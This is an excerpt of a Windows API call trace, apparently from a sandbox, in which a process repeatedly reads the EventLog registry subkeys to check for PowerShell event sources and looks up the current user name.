	[0645.644] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x0) returned 0x2
	[0645.644] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x2f4) returned 0x0
	[0645.644] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x0) returned 0x2
	[0645.644] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x2f8) returned 0x0
	[0645.645] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x0) returned 0x2
	[0645.645] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x2fc) returned 0x0
	[0645.645] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x0) returned 0x2
	[0645.645] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x314) returned 0x0
	[0645.645] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x0) returned 0x2
	[0645.645] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x328) returned 0x0
	[0645.645] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x0) returned 0x2
	[0645.645] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x32c) returned 0x0
	[0645.645] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x0) returned 0x2
	[0645.645] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x330) returned 0x0
	[0645.645] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x0) returned 0x2
	[0645.645] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x334) returned 0x0
	[0645.646] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x338) returned 0x0
	[0645.646] RegCloseKey (hKey=0x338) returned 0x0
	[0645.646] RegCloseKey (hKey=0x2e8) returned 0x0
	[0645.647] RegCloseKey (hKey=0x334) returned 0x0
	[0645.659] CoTaskMemAlloc (cb=0x804) returned 0x1b880b60
	[0645.659] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b880b60, nSize=0x16d388 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d388) returned 0x1
	[0647.672] CoTaskMemFree (pv=0x1b880b60) 
	[0647.673] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0647.673] GetUserNameW (in: lpBuffer=0x1f1ef0, pcbBuffer=0x16d3c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d3c8) returned 1
	[0647.673] CoTaskMemFree (pv=0x1f1ef0) 
	[0647.691] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0c8 | out: phkResult=0x16d0c8*=0x33c) returned 0x0
	[0647.691] RegQueryInfoKeyW (in: hKey=0x33c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d03c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d038, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d03c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d038*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0647.691] CoTaskMemFree (pv=0x0) 
	[0647.692] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0647.692] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x0, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0647.692] CoTaskMemFree (pv=0x1f1ef0) 
	[0647.692] CoTaskMemFree (pv=0x0) 
	[0647.692] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0647.692] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x1, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0647.692] CoTaskMemFree (pv=0x1f1ef0) 
	[0647.692] CoTaskMemFree (pv=0x0) 
	[0647.692] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0647.692] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x2, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0647.692] CoTaskMemFree (pv=0x1f1ef0) 
	[0647.692] CoTaskMemFree (pv=0x0) 
	[0647.692] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0647.692] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x3, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0647.692] CoTaskMemFree (pv=0x1f1ef0) 
	[0647.693] CoTaskMemFree (pv=0x0) 
	[0647.693] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0647.693] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x4, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0647.693] CoTaskMemFree (pv=0x1f1ef0) 
	[0647.693] CoTaskMemFree (pv=0x0) 
	[0647.693] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0647.693] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x5, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0647.693] CoTaskMemFree (pv=0x1f1ef0) 
	[0647.693] CoTaskMemFree (pv=0x0) 
	[0647.693] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0647.693] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x6, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0647.693] CoTaskMemFree (pv=0x1f1ef0) 
	[0647.693] CoTaskMemFree (pv=0x0) 
	[0647.693] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0647.693] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x7, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0647.693] CoTaskMemFree (pv=0x1f1ef0) 
	[0647.694] CoTaskMemFree (pv=0x0) 
	[0647.694] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0647.694] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x8, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0647.694] CoTaskMemFree (pv=0x1f1ef0) 
	[0647.694] CoTaskMemFree (pv=0x0) 
	[0647.694] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x340) returned 0x0
	[0647.694] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0647.694] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x344) returned 0x0
	[0647.694] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0647.694] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x348) returned 0x0
	[0647.695] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0647.695] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x34c) returned 0x0
	[0647.695] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0647.695] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x350) returned 0x0
	[0647.695] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0647.695] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x354) returned 0x0
	[0647.695] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0647.695] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x358) returned 0x0
	[0647.695] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0647.696] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x35c) returned 0x0
	[0647.696] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0647.696] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x360) returned 0x0
	[0647.696] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x364) returned 0x0
	[0647.696] RegCloseKey (hKey=0x364) returned 0x0
	[0647.696] RegCloseKey (hKey=0x33c) returned 0x0
	[0647.697] RegCloseKey (hKey=0x360) returned 0x0
	[0649.669] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0c8 | out: phkResult=0x16d0c8*=0x360) returned 0x0
	[0649.669] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d03c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d038, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d03c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d038*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.669] CoTaskMemFree (pv=0x0) 
	[0649.669] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.669] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.670] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.670] CoTaskMemFree (pv=0x0) 
	[0649.670] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.670] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.670] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.670] CoTaskMemFree (pv=0x0) 
	[0649.670] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.670] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.670] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.670] CoTaskMemFree (pv=0x0) 
	[0649.670] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.670] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.670] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.670] CoTaskMemFree (pv=0x0) 
	[0649.671] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.671] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.671] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.671] CoTaskMemFree (pv=0x0) 
	[0649.671] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.671] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.671] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.671] CoTaskMemFree (pv=0x0) 
	[0649.671] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.671] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.671] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.671] CoTaskMemFree (pv=0x0) 
	[0649.671] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.671] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.671] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.672] CoTaskMemFree (pv=0x0) 
	[0649.672] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.672] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x1f1ef0, lpcchName=0x16d0c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d0c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.672] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.672] CoTaskMemFree (pv=0x0) 
	[0649.672] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x33c) returned 0x0
	[0649.672] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0649.672] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x364) returned 0x0
	[0649.672] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0649.672] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x368) returned 0x0
	[0649.673] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0649.673] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x36c) returned 0x0
	[0649.673] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0649.673] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x370) returned 0x0
	[0649.673] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0649.673] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x374) returned 0x0
	[0649.673] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0649.673] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x378) returned 0x0
	[0649.674] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0649.674] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x37c) returned 0x0
	[0649.674] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x0) returned 0x2
	[0649.674] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x380) returned 0x0
	[0649.674] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d128 | out: phkResult=0x16d128*=0x384) returned 0x0
	[0649.674] RegCloseKey (hKey=0x384) returned 0x0
	[0649.674] RegCloseKey (hKey=0x360) returned 0x0
	[0649.675] RegCloseKey (hKey=0x380) returned 0x0
	[0649.676] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d098 | out: phkResult=0x16d098*=0x380) returned 0x0
	[0649.676] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d00c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d008, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d00c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d008*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.676] CoTaskMemFree (pv=0x0) 
	[0649.676] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.676] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x1f1ef0, lpcchName=0x16d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.676] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.676] CoTaskMemFree (pv=0x0) 
	[0649.676] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.676] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x1f1ef0, lpcchName=0x16d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.677] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.677] CoTaskMemFree (pv=0x0) 
	[0649.677] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.677] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x1f1ef0, lpcchName=0x16d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.677] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.677] CoTaskMemFree (pv=0x0) 
	[0649.677] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.677] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x1f1ef0, lpcchName=0x16d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.677] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.677] CoTaskMemFree (pv=0x0) 
	[0649.677] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.677] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x1f1ef0, lpcchName=0x16d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.677] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.677] CoTaskMemFree (pv=0x0) 
	[0649.677] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.677] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x1f1ef0, lpcchName=0x16d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.678] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.678] CoTaskMemFree (pv=0x0) 
	[0649.678] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.678] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x1f1ef0, lpcchName=0x16d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.678] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.678] CoTaskMemFree (pv=0x0) 
	[0649.678] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.678] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x1f1ef0, lpcchName=0x16d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.678] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.678] CoTaskMemFree (pv=0x0) 
	[0649.678] CoTaskMemAlloc (cb=0x204) returned 0x1f1ef0
	[0649.678] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x1f1ef0, lpcchName=0x16d098, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d098, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0649.678] CoTaskMemFree (pv=0x1f1ef0) 
	[0649.678] CoTaskMemFree (pv=0x0) 
	[0649.678] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x360) returned 0x0
	[0649.679] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d0f8 | out: phkResult=0x16d0f8*=0x0) returned 0x2
